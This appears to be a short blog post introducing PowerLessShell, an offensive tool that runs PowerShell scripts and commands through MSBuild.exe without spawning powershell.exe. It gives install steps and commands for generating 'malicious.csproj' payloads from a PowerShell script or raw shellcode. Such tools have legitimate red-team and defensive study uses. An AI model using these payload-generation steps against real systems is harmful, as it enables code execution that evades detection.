PowerLessShell
- Thiru T
- Nov 29, 2024
- 1 min read
Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.
Install:
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell
cd PowerLessShellUsage:
# Help
python PowerLessShell.py -h
# Generate PowerShell payload
python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj
# Generating a shellcode payload
python PowerLessShell.py -source shellcode.raw -output malicious.csprojFull usage information can be found here.




Comments